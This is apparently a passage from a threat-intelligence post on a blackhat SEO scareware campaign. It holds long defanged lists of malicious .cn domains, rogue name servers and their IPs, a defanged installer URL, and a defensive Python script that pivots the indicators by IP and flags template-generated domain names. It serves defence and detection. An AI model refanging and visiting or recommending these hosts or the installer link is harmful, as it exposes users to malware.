hxxp://goqdexuv.cn
hxxp://fozlubaw.cn
hxxp://yuxcizaw.cn
hxxp://mevvubew.cn
hxxp://nuzzuhew.cn
hxxp://dibkicow.cn
hxxp://lobrakow.cn
hxxp://vuksirow.cn
hxxp://samnuvow.cn
hxxp://jizlotuw.cn
hxxp://buzgikax.cn
hxxp://jawcesax.cn
hxxp://qatvegex.cn
hxxp://gegfejex.cn
hxxp://cigxekex.cn
hxxp://kejjobox.cn
hxxp://yosbucox.cn
hxxp://kelmogox.cn
hxxp://jeqyuzox.cn
hxxp://jocxebux.cn
hxxp://tawcizux.cn
hxxp://kittokay.cn
hxxp://seryusay.cn
hxxp://nocbusey.cn
hxxp://semfihiy.cn
hxxp://xotgajiy.cn
hxxp://sarvujiy.cn
hxxp://gicmosiy.cn
hxxp://fulpaziy.cn
hxxp://cunzumoy.cn
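
The two things a defender actually does with lists like the ones above are pivot on the shared IP (every domain that answered from 60.191.221.123 is worth the same block) and recognise the naming template so that the next batch of registrations can be caught before it shows up in a report. The script below is an added example and not code from the original post: it parses lines in the post's own "hxxp://host - ip" layout, refangs them, groups hosts by the IP they resolved to, and flags labels that fit the eight-letter consonant/vowel template the .cn names follow. The sample lines are constructed from a handful of entries on this page; the assumption that an IP given on one line also applies to the lines beneath it, until the next IP, is mine and mirrors how the post groups its "known to have responded to the same IP" domains.

```python
"""Pivot defanged indicators by resolved IP and flag template-generated labels."""
from __future__ import annotations

import re
from collections import defaultdict

# Constructed sample in the post's own list layout (a few entries lifted from
# the lists on this page, not the full set). A trailing " - <ip>" gives the
# IP the host resolved to.
SAMPLE = """\
hxxp://vitsulob.cn - 60.191.221.123
hxxp://jahnivub.cn
hxxp://wipviyub.cn
hxxp://xiskizop.cn - 58.17.3.44
hxxp://columnultra.com - 58.17.3.41
hxxp://milkhold.com
hxxp://ns2.boostaroma.com - 110.52.6.252
hxxp://thebest-antivirus00.com - 91.212.226.203
hxxp://safe-fileshere.com/s/w58238e9a6c1h76k73r/setup.exe - 193.169.12.5
"""

IPV4 = r"\d{1,3}(?:\.\d{1,3}){3}"
LINE_RE = re.compile(
    r"^\s*hxxps?://(?P<host>[^\s/;]+)(?:/\S*)?(?:\s*-\s*(?P<ip>" + IPV4 + r"))?\s*;?\s*$",
    re.IGNORECASE,
)

# Eight-letter consonant/vowel template (C V C C V C V C) that the .cn names on
# this page follow, e.g. vitsulob, xiskizop, bepnudax. 'y' is treated as a
# consonant because the names use it that way (seryusay, niyyurin).
CONS, VOW = "[b-df-hj-np-tv-z]", "[aeiou]"
TEMPLATE_RE = re.compile(f"^{CONS}{VOW}{CONS}{CONS}{VOW}{CONS}{VOW}{CONS}$")


def refang(host: str) -> str:
    """Normalise a host taken from a defanged line: lowercase, no trailing dot."""
    return host.lower().rstrip(".")


def matches_template(host: str) -> bool:
    """True when the leftmost label fits the campaign's eight-letter template."""
    return TEMPLATE_RE.fullmatch(host.split(".")[0]) is not None


def parse_indicators(text: str) -> list[tuple[str, str | None]]:
    """Return (host, ip) pairs from lines in the post's layout.

    An IP given on one line is assumed to apply to the lines beneath it until
    the next IP appears (an assumption about the layout, not something the
    post states). Lines that are not indicators are skipped.
    """
    records: list[tuple[str, str | None]] = []
    current_ip: str | None = None
    for raw in text.splitlines():
        m = LINE_RE.match(raw)
        if not m:
            continue  # headings, blank lines, page residue
        if m.group("ip"):
            current_ip = m.group("ip")
        records.append((refang(m.group("host")), current_ip))
    return records


def pivot_by_ip(records: list[tuple[str, str | None]]) -> dict[str | None, list[str]]:
    """Group hosts by the IP they resolved to, deduplicated and sorted."""
    by_ip: dict[str | None, set[str]] = defaultdict(set)
    for host, ip in records:
        by_ip[ip].add(host)
    return {ip: sorted(hosts) for ip, hosts in by_ip.items()}


def flagged(records: list[tuple[str, str | None]]) -> list[str]:
    """Hosts whose label fits the template; a hunting lead, not a verdict."""
    return sorted({host for host, _ in records if matches_template(host)})


if __name__ == "__main__":
    recs = parse_indicators(SAMPLE)
    for ip, hosts in pivot_by_ip(recs).items():
        print(ip, "->", ", ".join(hosts))
    print("template hits:", ", ".join(flagged(recs)))
```

Feed the `pivot_by_ip` groups to a blocklist keyed on the IP and run `matches_template` over passive DNS or proxy logs restricted to .cn; the template is a heuristic, so an ordinary eight-letter word that happens to fit the pattern will also match and a hit should be treated as a pivot lead rather than a conviction.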

Related malicious name servers known to have 
participated in the campaign: 

hxxp://ns2.boostaroma.com - 110.52.6.252
hxxp://ns2.okultra.com
hxxp://ns2.swellfab.com
hxxp://ns2.shehead.com
hxxp://ns2.atbread.com
hxxp://ns2.treatglad.com
hxxp://ns2.plumbold.com
hxxp://ns2.callold.com
hxxp://up2.thicksend.com
hxxp://ns6.zestkind.com
hxxp://ns2.burnround.com
hxxp://ns2.witproud.com
hxxp://ns2.fizznice.com
hxxp://ns6.plusspice.com
hxxp://up2.humaneagree.com
hxxp://ns2.adorewee.com
hxxp://ns4.kindable.com
hxxp://ns2.prideable.com
hxxp://ns2.cuddlyhumble.com
hxxp://ns2.ablewhole.com
hxxp://ns2.quickwhole.com
hxxp://ns2.plumpwhole.com
hxxp://up2.begancome.com
hxxp://up2.sizeplane.com
hxxp://up2.colonytype.com
hxxp://ns6.prizeaware.com
hxxp://ns2.pridesure.com
hxxp://ns2.toophrase.com
hxxp://ns2.loyalrise.com
hxxp://up2.pathuse.com
hxxp://ns2.dimplechaste.com
hxxp://ns2.welltrue.com
hxxp://ns2.ziptrue.com
hxxp://ns2.silverwe.com
hxxp://ns2.calmprize.com
hxxp://ns2.firmrich.com
hxxp://ns2.activeinch.com
hxxp://ns2.coolmulti.com
hxxp://ns2.wellmoral.com
hxxp://ns2.peakswell.com
hxxp://ns2.posewill.com
hxxp://ns2.droolcool.com
hxxp://up2.cuddlypoem.com
hxxp://ns2.loyalcalm.com
hxxp://ns2.extolcalm.com
hxxp://ns2.radiothan.com
hxxp://up2.persontrain.com
hxxp://ns2.awardfun.com
hxxp://ns4.zealreap.com
hxxp://ns2.piousreap.com
hxxp://ns2.firstreap.com
hxxp://ns2.grandzap.com
hxxp://ns2.royalzap.com
hxxp://ns6.ablezip.com
hxxp://ns2.zapeager.com
hxxp://up2.blockfather.com
hxxp://ns2.breezycorner.com
hxxp://ns2.donewater.com
hxxp://ns2.listenflower.com
hxxp://ns2.dimplechair.com
hxxp://up2.yardcolor.com
hxxp://ns4.fizzleads.com
hxxp://up2.finestgrass.com
hxxp://ns2.prizebeats.com
hxxp://ns4.maxigreat.com
hxxp://ns2.flairtreat.com
hxxp://up2.tingleflat.com
hxxp://ns6.proudquiet.com
hxxp://ns2.morequiet.com
hxxp://ns2.droolplanet.com
hxxp://up2.giftedunit.com
hxxp://ns2.solarwit.com
hxxp://ns2.ropemeant.com
hxxp://ns2.paradiseobedient.com
hxxp://ns4.paradiseobedient.com
hxxp://up2.minealert.com
hxxp://ns4.spicyrest.com
hxxp://ns4.alertjust.com
hxxp://ns2.resttrust.com
hxxp://ns2.pagefew.com
hxxp://ns2.multiaglow.com
hxxp://ns2.objectallow.com
hxxp://ns2.alertwow.com
hxxp://ns2.alivejuicy.com
hxxp://ns2.restjuicy.com
hxxp://ns2.funcomfy.com
hxxp://ns2.solarcomfy.com
hxxp://ns2.prizetangy.com
hxxp://ns2.wholehappy.com
hxxp://ns2.prideeasy.com
hxxp://ns2.suddeneasy.com
hxxp://ns2.treatrosy.com
hxxp://ns2.earlytwenty.com

Related malicious domains known to have 
participated in the campaign: 

hxxp://xiskizop.cn - 58.17.3.44; 60.191.239.189; 203.93.208.86

Related name servers: hxxp://ns5.prizeaware.com; hxxp://ns1.grandzap.com; hxxp://ns3.alertjust.com

Related malicious domains known to have 
participated in the campaigns: 

hxxp://xancefab.cn
hxxp://busgihab.cn
hxxp://putcojab.cn
hxxp://nizvonab.cn
hxxp://bulpapab.cn
hxxp://laztoqab.cn
hxxp://varsesab.cn
hxxp://pahdeheb.cn
hxxp://wiqponeb.cn
hxxp://rutfuseb.cn
hxxp://zacniyeb.cn
hxxp://beblelib.cn
hxxp://gahvosib.cn
hxxp://rigzowib.cn
hxxp://bacnaxib.cn
hxxp://pexyufob.cn
hxxp://sowgugob.cn
hxxp://buhbulob.cn
hxxp://ciybufub.cn
hxxp://xoddimub.cn
hxxp://nugtaqub.cn
hxxp://buvkuzub.cn
hxxp://fikqebac.cn
hxxp://pevremac.cn
hxxp://qokbasac.cn
hxxp://patmebec.cn
hxxp://kuntigec.cn
hxxp://jolcekec.cn
hxxp://wihjorec.cn
hxxp://fixruyec.cn
hxxp://gospozec.cn
hxxp://batrijic.cn
hxxp://rebzomic.cn
hxxp://loqrupic.cn
hxxp://diqhaqic.cn
hxxp://bohkoqic.cn
hxxp://beszesic.cn
hxxp://tuzhovic.cn
hxxp://hesyuvic.cn
hxxp://kovhewic.cn
hxxp://lufreyic.cn
hxxp://noxrazic.cn
hxxp://lefviboc.cn
hxxp://fodcuboc.cn
hxxp://pevhihoc.cn
hxxp://widlajoc.cn
hxxp://zocwoloc.cn
hxxp://janpupoc.cn
hxxp://mefbuqoc.cn
hxxp://hujqezoc.cn
hxxp://capjebuc.cn
hxxp://befqacuc.cn
hxxp://socjujuc.cn
hxxp://qivbiruc.cn
hxxp://tuxbaxuc.cn
hxxp://tidsuyuc.cn
hxxp://kapdacad.cn
hxxp://lagfagad.cn
hxxp://japtugad.cn
hxxp://bechumad.cn
hxxp://holceqad.cn
hxxp://bectusad.cn
hxxp://tabzuwad.cn
hxxp://rednezad.cn
hxxp://megzizad.cn
hxxp://forvafed.cn
hxxp://hojliged.cn
hxxp://fuxcexed.cn
hxxp://baxpuxed.cn
hxxp://lugjized.cn
hxxp://lewdozed.cn
hxxp://hiszedid.cn
hxxp://buyquhid.cn
hxxp://wovyokid.cn
hxxp://yojvimid.cn
hxxp://widxixid.cn
hxxp://yovxoxid.cn
hxxp://reywufod.cn
hxxp://hubzahod.cn
hxxp://qapzekod.cn
hxxp://falxalod.cn
hxxp://yiznunod.cn
hxxp://towqotod.cn
hxxp://loxlayod.cn
hxxp://rockozod.cn
hxxp://johmabud.cn
hxxp://muvyucud.cn
hxxp://vattehud.cn
hxxp://fuytejud.cn
hxxp://kenyilud.cn
hxxp://cibsarud.cn
hxxp://najsatud.cn
hxxp://xibwazud.cn
hxxp://laztafaf.cn
hxxp://piynosaf.cn
hxxp://yelpidef.cn
hxxp://yagtudef.cn
hxxp://levxifef.cn
hxxp://povxajef.cn
hxxp://hetbetef.cn
hxxp://hudvotef.cn
hxxp://hemfowef.cn
hxxp://coqvazef.cn
hxxp://yawhojif.cn
hxxp://muvcewif.cn
hxxp://xadgobof.cn
hxxp://baxwuhof.cn
hxxp://wijtekof.cn
hxxp://sknqikof.cn
hxxp://mussiqof.cn
hxxp://gegwasof.cn
hxxp://xangesof.cn
hxxp://wumdewof.cn
hxxp://hoqtayof.cn
hxxp://kiyvayof.cn
hxxp://cufdicuf.cn
hxxp://gotbucuf.cn
hxxp://gexzehuf.cn
hxxp://cepceluf.cn
hxxp://gepleluf.cn
hxxp://tefhosuf.cn
hxxp://xaqqivuf.cn
hxxp://wubfezuf.cn
hxxp://panrozuf.cn
hxxp://nadvofag.cn
hxxp://yawjehag.cn
hxxp://zeltimag.cn
hxxp://misgaqag.cn
hxxp://noxyaxag.cn
hxxp://sunluxag.cn
hxxp://bozhoceg.cn
hxxp://dawqefeg.cn
hxxp://locfemeg.cn
hxxp://mivlaneg.cn
hxxp://vaqxiseg.cn
hxxp://gesyateg.cn
hxxp://kumweteg.cn
hxxp://jefpaveg.cn
hxxp://lilyegig.cn
hxxp://janweqig.cn
hxxp://diwjusig.cn
hxxp://sohmiwig.cn
hxxp://rimmazig.cn
hxxp://tirpedog.cn
hxxp://jamguhog.cn
hxxp://bejfakog.cn
hxxp://bebyolog.cn
hxxp://kixmamog.cn
hxxp://tofyeqog.cn
hxxp://kojxuqog.cn
hxxp://puqtabug.cn
hxxp://suszibug.cn
hxxp://ciwracug.cn
hxxp://nahbugug.cn
hxxp://gaygokug.cn
hxxp://seygoqug.cn
hxxp://helqasug.cn
hxxp://tockesug.cn
hxxp://jipqevug.cn
hxxp://rewnowug.cn
hxxp://nazxefah.cn
hxxp://hofkagah.cn
hxxp://coszegah.cn
hxxp://vojyojah.cn
hxxp://nihwalah.cn
hxxp://yojzatah.cn
hxxp://buvsutah.cn
hxxp://hulgadeh.cn
hxxp://nibzofeh.cn
hxxp://xickeqeh.cn
hxxp://kapmereh.cn
hxxp://regyaveh.cn
hxxp://lizpazeh.cn
hxxp://lujpobih.cn
hxxp://xozyecih.cn
hxxp://telhetih.cn
hxxp://dussadoh.cn
hxxp://lerbenoh.cn
hxxp://yokveqoh.cn
hxxp://hafgoqoh.cn
hxxp://gagkiroh.cn
hxxp://teftebuh.cn
hxxp://fitsofuh.cn
hxxp://ziwvomuh.cn
hxxp://fazlenuh.cn
hxxp://gazkinuh.cn
hxxp://dutmivuh.cn
hxxp://zukdayuh.cn
hxxp://busgayuh.cn
hxxp://nohpobaj.cn
hxxp://qusdumaj.cn
hxxp://wizdaqaj.cn
hxxp://wuwbeqaj.cn
hxxp://girzidej.cn
hxxp://vespifej.cn
hxxp://ceszegej.cn
hxxp://juqbumej.cn
hxxp://xuxmanej.cn

Related malicious name servers known to have 
participated in the campaign: 

hxxp://ns1.quvzipcla.com - 193.165.209.3
hxxp://ns1.syquskezaja.com
hxxp://ns1.mnysiwugpa.com
hxxp://ns1.uzfayxlob.com
hxxp://ns1.umkeihfub.com
hxxp://ns1.diethealthworld.com
hxxp://ns2.diethealthworld.com
hxxp://ns1.pillshopstore.com
hxxp://ns2.pillshopstore.com
hxxp://ns1.ixcopvucieg.com
hxxp://ns1.cuzatpih.com
hxxp://ns1.fondukoiwi.com
hxxp://ns1.zevmyxhyhi.com
hxxp://ns1.pecsletoil.com
hxxp://ns1.havputviwl.com
hxxp://ns1.icuhzapyi.com
hxxp://ns1.ollectimon.com
hxxp://ns1.calpuwhup.com
hxxp://ns1.miacohcier.com
hxxp://ns1.rjycbaswes.com
hxxp://ns1.tlyldihkis.com
hxxp://ns2.bestfreepills.com
hxxp://ns2.storehealthpills.com
hxxp://ns1.medspillsdiscounts.com
hxxp://ns1.ribormolu.com
hxxp://ns1.sluxjagvyw.com
hxxp://ns1.marttabletsrx.com
hxxp://ns1.zirremeaby.com
hxxp://ns1.xioduvvejy.com
hxxp://ns1.tmypheatvy.com
hxxp://ns1.zurmeigguz.com
hxxp://ns1.pendyxconvam.net
hxxp://ns1.mevkybmomu.net
hxxp://ns1.wutvymnu.net
hxxp://ns1.atquackephix.net
hxxp://ns1.gneqwyapuz.net
hxxp://ns1.az6.ru
hxxp://ns1.compmegastore.ru
hxxp://ns1.wearcompstore.ru
hxxp://ns1.compnetstore.ru
hxxp://ns1.seaportative.ru
hxxp://ns1.webshopmag.ru
hxxp://ns2.webshopmag.ru
hxxp://ns1.markettradersmag.ru
hxxp://ns1.storeonlinecomp.ru
hxxp://ns1.livingmagcomp.ru
hxxp://ns1.magcompdirect.ru
hxxp://ns1.storemycompdirect.ru

Related malicious domains known to have 
participated in the campaigns: 

hxxp://hyuijavmyca.com - 212.174.200.111
hxxp://rjiofnida.com
hxxp://iubetokbufa.com
hxxp://homhyivega.com
hxxp://syquskezaja.com
hxxp://kriwmikib.com
hxxp://rhuwcugniob.com
hxxp://fonrasetiid.com
hxxp://rycnyrfikre.com
hxxp://toniijwe.com
hxxp://mefcyqwef.com
hxxp://lorcowurayf.com
hxxp://ubeuhroqug.com
hxxp://facljybzih.com
hxxp://ghaknikfehi.com
hxxp://ksoknaclsi.com
hxxp://fondukoiwi.com
hxxp://reixvyklick.com
hxxp://qworjulnenk.com
hxxp://svozquzrel.com
hxxp://pecsletoil.com
hxxp://havputviwl.com
hxxp://pendyxconvam.com
hxxp://whapzintaon.com
hxxp://ollectimon.com
hxxp://japyebawn.com
hxxp://xovtemfajo.com
hxxp://shymumoufjo.com
hxxp://calpuwhup.com
hxxp://iescehqucr.com
hxxp://thepillcorner.com
hxxp://kvirincyofr.com
hxxp://iecoqwecs.com

hxxp://syquskezaja.com - 200.204.57.187
hxxp://cuzatpih.com
hxxp://ollectimon.com
hxxp://sluxjagvyw.com
hxxp://xioduvvejy.com
hxxp://nravsaelvi.net
hxxp://pendyxconvam.net
hxxp://mevkybmomu.net
hxxp://atquackephix.net
hxxp://gneqwyapuz.net

Related malicious domains known to have 
participated in the campaign: 

hxxp://tovpuveb.cn
hxxp://risregib.cn
hxxp://sapwopub.cn
hxxp://kutwuzub.cn
hxxp://dijmigac.cn
hxxp://davzunic.cn
hxxp://cuwlicoc.cn
hxxp://hinkizad.cn
hxxp://tiwkicid.cn
hxxp://giddehid.cn
hxxp://qehmujid.cn
hxxp://jadyoxid.cn
hxxp://yipxakud.cn
hxxp://qophepud.cn
hxxp://nawfusud.cn
hxxp://xohpebaf.cn
hxxp://yilqobaf.cn
hxxp://gelkinef.cn
hxxp://zigconef.cn
hxxp://vasgotef.cn
hxxp://gitmufif.cn
hxxp://pujxatof.cn
hxxp://tagcafuf.cn
hxxp://joywehuf.cn
hxxp://xoggunuf.cn
hxxp://pezpipuf.cn
hxxp://gugfequf.cn
hxxp://kattowuf.cn
hxxp://rosmicag.cn
hxxp://nagnuteg.cn
hxxp://fohjedig.cn
hxxp://hijderig.cn
hxxp://dittomog.cn
hxxp://zubwefah.cn
hxxp://fodpohah.cn
hxxp://sehviwah.cn
hxxp://hifkuneh.cn
hxxp://bidfecih.cn
hxxp://wuxmulih.cn
hxxp://beqwacoh.cn
hxxp://qukvimoh.cn
hxxp://vasxavoh.cn
hxxp://salxaxoh.cn
hxxp://labyocaj.cn
hxxp://zigxadij.cn
hxxp://hixkanij.cn
hxxp://zixkitoj.cn
hxxp://zijzoguj.cn
hxxp://yiwzuluj.cn
hxxp://survuruj.cn
hxxp://feftuqak.cn
hxxp://ziscawak.cn
hxxp://wacpowek.cn
hxxp://segjinuk.cn
hxxp://viqfizuk.cn
hxxp://qawgegal.cn
hxxp://loqfogal.cn
hxxp://sihwohal.cn
hxxp://babtakal.cn
hxxp://nagnemel.cn
hxxp://ribwegil.cn
hxxp://watpiyil.cn
hxxp://goxmabul.cn
hxxp://siwkecul.cn
hxxp://selzimul.cn
hxxp://qakwivul.cn
hxxp://bedvuyul.cn
hxxp://fiddozul.cn
hxxp://joldokim.cn
hxxp://foztokim.cn
hxxp://woklahum.cn
hxxp://gavsanum.cn
hxxp://kejrupum.cn
hxxp://hagjatum.cn
hxxp://xumfuzum.cn
hxxp://mafcocan.cn
hxxp://geqkedan.cn
hxxp://fumhasan.cn
hxxp://zosqinen.cn
hxxp://nonzinen.cn
hxxp://tahyedin.cn
hxxp://niyyurin.cn
hxxp://wokmison.cn
hxxp://nekmerun.cn
hxxp://gebzevun.cn
hxxp://dizxohap.cn
hxxp://wirzovap.cn
hxxp://cobyizip.cn
hxxp://sokwimop.cn
hxxp://digjipop.cn
hxxp://qagtohup.cn
hxxp://wodkepaq.cn
hxxp://kuqqavaq.cn
hxxp://vogyafeq.cn
hxxp://qokyaziq.cn
hxxp://gelmaloq.cn
hxxp://rikxeduq.cn
hxxp://mifzoyuq.cn
hxxp://jitmekar.cn
hxxp://zedbeper.cn
hxxp://qoyrifir.cn
hxxp://rerbogir.cn
hxxp://nexyutir.cn
hxxp://yuvwobor.cn
hxxp://raddijor.cn
hxxp://rehciror.cn
hxxp://jowqasor.cn
hxxp://wotrisor.cn
hxxp://tinselur.cn
hxxp://sacvakes.cn
hxxp://xonlefis.cn
hxxp://sehwukos.cn
hxxp://torxupos.cn
hxxp://yujzidus.cn
hxxp://dejzezat.cn
hxxp://gunjivet.cn
hxxp://hecfocav.cn
hxxp://yuxdiqav.cn
hxxp://guysogiv.cn
hxxp://tebziniv.cn
hxxp://dedsupov.cn
hxxp://genwsxov.cn
hxxp://xaycozuv.cn
hxxp://fojgoraw.cn
hxxp://suwsozaw.cn
hxxp://hudwuhew.cn
hxxp://momzuhew.cn
hxxp://pibwokiw.cn
hxxp://lacfimiw.cn
hxxp://jubduriw.cn
hxxp://talcuviw.cn
hxxp://xavgubow.cn
hxxp://zovcofow.cn
hxxp://qopzubax.cn
hxxp://dogqodax.cn
hxxp://jimjakax.cn
hxxp://ricnafex.cn
hxxp://nadlewex.cn
hxxp://mokcegox.cn
hxxp://getkixox.cn
hxxp://wucpulux.cn
hxxp://dalpobay.cn
hxxp://refhagay.cn
hxxp://jusyadey.cn
hxxp://reqpijey.cn
hxxp://vebzaqiy.cn
hxxp://sejtogoy.cn
hxxp://yecnaquy.cn
hxxp://xufguyuy.cn
hxxp://puktunaz.cn
hxxp://zaztuvaz.cn
hxxp://sixbufiz.cn
hxxp://nofdowiz.cn
hxxp://cuvxoqoz.cn
hxxp://yugkiwuz.cn

Related malicious domains known to have 
participated in the campaign: 

hxxp://columnultra.com - 58.17.3.41
hxxp://milkhold.com
hxxp://eagerboard.com
hxxp://yesonlynoun.com
hxxp://differdo.com
hxxp://seemlykeep.com
hxxp://seemnear.com
hxxp://modernbut.com

Related malicious domains known to have
participated in the campaign:

hxxp://litgukab.cn
hxxp://xojyupab.cn
hxxp://ritlarab.cn
hxxp://qeqyukeb.cn
hxxp://fedpijib.cn
hxxp://xumlodob.cn
hxxp://kozgewob.cn
hxxp://fajnahec.cn
hxxp://nedsicic.cn
hxxp://hertuqic.cn
hxxp://linrudoc.cn
hxxp://gilqufuc.cn
hxxp://lijwituc.cn
hxxp://loqbaxuc.cn
hxxp://camxezuc.cn
hxxp://foyxolad.cn
hxxp://bapvusad.cn
hxxp://wokmeyad.cn
hxxp://yizqosed.cn
hxxp://vivwiwef.cn
hxxp://percaqof.cn
hxxp://cepceluf.cn
hxxp://paqhizuf.cn
hxxp://vorvivag.cn
hxxp://maynixeg.cn
hxxp://mujyumig.cn
hxxp://coyrekog.cn
hxxp://xetvetih.cn
hxxp://mugyujuh.cn
hxxp://supsizuh.cn
hxxp://bixtakaj.cn
hxxp://lanmixej.cn
hxxp://worxezej.cn
hxxp://tikgepij.cn
hxxp://yatsanak.cn
hxxp://tucgosak.cn
hxxp://hihnuwak.cn
hxxp://qilfadek.cn
hxxp://zibsitik.cn
hxxp://xetmojok.cn
hxxp://yelsecuk.cn
hxxp://confowuk.cn
hxxp://pozzoxuk.cn
hxxp://savhixal.cn
hxxp://nudtaqel.cn
hxxp://keptavol.cn
hxxp://berqufam.cn
hxxp://wuqrulam.cn
hxxp://goftiwam.cn
hxxp://vowcajem.cn
hxxp://rizfinim.cn
hxxp://jetgekom.cn
hxxp://letjucun.cn
hxxp://wivwiqap.cn
hxxp://duccesap.cn
hxxp://zamyisap.cn
hxxp://ranpovep.cn
hxxp://kucdawep.cn
hxxp://limjapip.cn
hxxp://ciggecop.cn
hxxp://ziybelop.cn
hxxp://yakquyeq.cn
hxxp://borremiq.cn
hxxp://vuzwesuq.cn
hxxp://rosvocor.cn
hxxp://hakdugas.cn
hxxp://kabmebes.cn
hxxp://purhuves.cn
hxxp://gopmocis.cn
hxxp://cabziqis.cn
hxxp://pomzonos.cn
hxxp://zojvapus.cn
hxxp://nobfemat.cn
hxxp://ritcubav.cn
hxxp://bibbikev.cn
hxxp://daslulev.cn
hxxp://naczoduv.cn
hxxp://betjoqiw.cn
hxxp://yoqlamow.cn
hxxp://jawjeqow.cn
hxxp://zijmivuw.cn
hxxp://dupqozuw.cn
hxxp://fatnudax.cn
hxxp://defrogax.cn
hxxp://kalyahax.cn
hxxp://toztipax.cn
hxxp://gecfopax.cn
hxxp://wuqzubex.cn
hxxp://hexpadix.cn
hxxp://luhnukox.cn
hxxp://vecbibey.cn
hxxp://dimgecey.cn
hxxp://fammuvey.cn
hxxp://zepfabiy.cn
hxxp://gewvamiy.cn
hxxp://pekzariy.cn
hxxp://pixkinaz.cn
hxxp://mecqulez.cn
hxxp://yubreliz.cn
hxxp://juvmeriz.cn
hxxp://mafcixiz.cn
hxxp://butlezoz.cn
hxxp://xisqapuz.cn
hxxp://jihkohab.cn
hxxp://litgukab.cn
hxxp://xojyupab.cn
hxxp://ritlarab.cn
hxxp://qancabeb.cn
hxxp://xaqkabeb.cn
hxxp://qeqyukeb.cn
hxxp://bobhoneb.cn
hxxp://fedpijib.cn
hxxp://kozgewob.cn
hxxp://mirlacub.cn
hxxp://jokrogub.cn
hxxp://qupbihac.cn
hxxp://viqnijac.cn
hxxp://bucdawac.cn
hxxp://latzoyac.cn
hxxp://ferkogec.cn
hxxp://qujqugec.cn
hxxp://fajnahec.cn
hxxp://saybilec.cn
hxxp://yaxxosec.cn
hxxp://nedsicic.cn
hxxp://cimhijic.cn
hxxp://hertuqic.cn
hxxp://linrudoc.cn
hxxp://mahhekoc.cn
hxxp://pegvijuc.cn
hxxp://camxezuc.cn
hxxp://kossehad.cn
hxxp://bapvusad.cn
hxxp://coffebed.cn
hxxp://xadjeqid.cn
hxxp://pehxarid.cn
hxxp://maknohod.cn
hxxp://yujhaqod.cn
hxxp://vevteyod.cn
hxxp://rinmumud.cn
hxxp://xuldeyud.cn
hxxp://fedrujaf.cn
hxxp://nugnosaf.cn
hxxp://koxpelef.cn
hxxp://tecyatef.cn
hxxp://hemfowef.cn
hxxp://pavlegif.cn
hxxp://percaqof.cn
hxxp://sizkeyof.cn
hxxp://zugkucuf.cn
hxxp://rijhuhuf.cn
hxxp://cepceluf.cn
hxxp://paqhizuf.cn
hxxp://xowjicag.cn
hxxp://dofpalag.cn
hxxp://hujrulag.cn
hxxp://maxtayag.cn
hxxp://qekvoceg.cn
hxxp://vazwureg.cn
hxxp://pilpuweg.cn
hxxp://wedruweg.cn
hxxp://cexkezeg.cn
hxxp://mujyumig.cn
hxxp://wintabog.cn
hxxp://nuzmohog.cn
hxxp://coyrekog.cn
hxxp://tubvuxog.cn
hxxp://zavdahug.cn
hxxp://yukpikug.cn
hxxp://muwsikeh.cn
hxxp://pecculeh.cn
hxxp://rafniteh.cn
hxxp://nukfijih.cn
hxxp://xetvetih.cn
hxxp://tikbacoh.cn
hxxp://zikwufuh.cn
hxxp://mugyujuh.cn
hxxp://hijbumuh.cn
hxxp://wubxayuh.cn
hxxp://quntoyuh.cn
hxxp://supsizuh.cn
hxxp://techegaj.cn
hxxp://bixtakaj.cn
hxxp://wuwbeqaj.cn
hxxp://caqhiqaj.cn
hxxp://lijzarej.cn
hxxp://lanmixej.cn
hxxp://jutzuzej.cn
hxxp://betkawij.cn
hxxp://mumrojoj.cn
hxxp://wulkukoj.cn
hxxp://selqetuj.cn
hxxp://zuvbowuj.cn
hxxp://sevpohak.cn
hxxp://qusvilak.cn
hxxp://qowrirak.cn
hxxp://tucgosak.cn
hxxp://bajhukek.cn
hxxp://qeyzecik.cn
hxxp://pijridik.cn
hxxp://yecgajik.cn
hxxp://tovboqik.cn
hxxp://sirrotik.cn
hxxp://pomzexik.cn
hxxp://nopvafok.cn
hxxp://xetmojok.cn
hxxp://fuqzuxok.cn
hxxp://xajkimuk.cn
hxxp://confowuk.cn
hxxp://pozzoxuk.cn
hxxp://vufmikal.cn
hxxp://korkusal.cn
hxxp://yasdaxal.cn
hxxp://nibnupel.cn
hxxp://nudtaqel.cn
hxxp://zivwirel.cn
hxxp://facjacil.cn
hxxp://qaqdidil.cn
hxxp://zirmidil.cn
hxxp://pivteqil.cn
hxxp://mutzomol.cn
hxxp://bahfosol.cn
hxxp://kajvatol.cn
hxxp://keptavol.cn
hxxp://mevvuqul.cn
hxxp://berqufam.cn
hxxp://zihwujam.cn
hxxp://jormofem.cn
hxxp://vowcajem.cn
hxxp://yawyibim.cn
hxxp://mibyumim.cn
hxxp://pabfakom.cn
hxxp://jetgekom.cn
hxxp://xolkizom.cn
hxxp://mujsikum.cn
hxxp://moynukan.cn
hxxp://ranfelan.cn
hxxp://kayjamen.cn
hxxp://kudcedon.cn
hxxp://getwison.cn
hxxp://givjivon.cn
hxxp://faykirun.cn
hxxp://zebxaxun.cn
hxxp://coclecap.cn
hxxp://texnipap.cn
hxxp://humyipap.cn
hxxp://duccesap.cn
hxxp://zamyisap.cn
hxxp://lunyicep.cn
hxxp://ranpovep.cn
hxxp://yifkebip.cn
hxxp://yiryemip.cn
hxxp://mowmoqip.cn
hxxp://wozhihop.cn
hxxp://mefrexop.cn
hxxp://qidyubup.cn
hxxp://qidjohup.cn
hxxp://lotjolup.cn
hxxp://dirdotup.cn
hxxp://memqowaq.cn
hxxp://civvufeq.cn
hxxp://bobfiliq.cn
hxxp://borremiq.cn
hxxp://singuroq.cn
hxxp://qudjuvoq.cn
hxxp://vuzwesuq.cn
hxxp://nuvmotuq.cn
hxxp://zohcidar.cn
hxxp://rentumar.cn
hxxp://fipzaqar.cn
hxxp://siqcatar.cn
hxxp://sagvitar.cn
hxxp://luqsiger.cn
hxxp://zuyxewer.cn
hxxp://jagnuyer.cn
hxxp://ruhbulir.cn
hxxp://sityeyir.cn
hxxp://rosvocor.cn
hxxp://julxapor.cn
hxxp://rixlupur.cn
hxxp://jutfisur.cn
hxxp://fabmotur.cn
hxxp://bukpuzur.cn
hxxp://pozsigas.cn
hxxp://hakdugas.cn
hxxp://lokzihas.cn
hxxp://mukkebes.cn
hxxp://mijpedes.cn
hxxp://conzakes.cn
hxxp://fodbemes.cn
hxxp://maqpumes.cn
hxxp://purhuves.cn
hxxp://hohgibis.cn
hxxp://kezyubis.cn
hxxp://gopmocis.cn
hxxp://soqsedis.cn
hxxp://defdoris.cn
hxxp://pomzonos.cn
hxxp://lanhovus.cn

We'll continue monitoring the campaign and post updates as soon as new developments take place.

Historical OSINT - Massive Blackhat SEO Campaign Spotted in the Wild Drops Scareware (2018-10-21 23:55)

